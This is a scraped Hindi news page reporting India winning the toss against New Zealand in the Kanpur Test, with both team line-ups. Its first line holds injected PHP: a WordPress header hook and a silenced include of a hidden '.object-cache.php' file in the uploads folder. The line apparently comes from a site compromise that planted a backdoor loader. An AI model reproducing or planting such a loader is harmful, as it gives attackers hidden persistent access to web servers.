add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Live भारत Vs न्यूजीलैंडः टॉस जीतकर टीम इंडिया ने चुनी बैटिंग – SOCH INDIA
Menu

खेल
Live भारत Vs न्यूजीलैंडः टॉस जीतकर टीम इंडिया ने चुनी बैटिंग

nobanner

कानपुर। कानपुर में न्यू जीलैंड के खिलाफ पहले टेस्ट मैच में भारतीय टीम ने टॉस जीत लिया है। भारत ने टॉस जीतकर पहले बल्लेबाजी का फैसला किया है। बता दें कि कानपुर के ग्रीनपार्क स्टेडियम में टीम इंडिया अपना 500वां टेस्ट मैच खेलने जा रही है।

भारतीय क्रिकेट टीम के कप्तान विराट कोहली ने मैच के एक दिन पहले कहा कि उनकी टीम में आगामी घरेलू सीरीज में न्यू जीलैंड को हराकर खेल के इस फॉर्मेट में शीर्ष टीम बनने की क्षमता है। भारत गुरुवार से ग्रीनपार्क स्टेडियम में कीवी टीम के साथ तीन टेस्ट मैचों की सीरीज का पहला मैच खेलने जा रहा है।

मैच से पहले संवाददाता सम्मेलन में कोहली ने कहा कि भारतीय टीम में वह सभी काबिलियत हैं जो विश्व की शीर्ष टीम में होनी चाहिए।

टीमें…

भारत: मुरली विजय, लोकेश राहुल, विराट कोहली, चेतेश्वर पुजारा, अजिंक्य रहाणे, रोहित शर्मा, रिद्धिमान साहा, आर. अश्विन, रवींद्र जडेजा, उमेश यादव, मोहम्मद शमी।

न्यूजीलैंड: टॉम लाथम, मार्टिन गुप्टिल, केन विलियम्सन, रॉस टेलर, ल्यूक रोंची, मिशेल सेंटनर, बीजे वॉटलिंग, मार्क क्रेग, नेल वागनर, ईश सोढ़ी, ट्रेंट बोल्ट।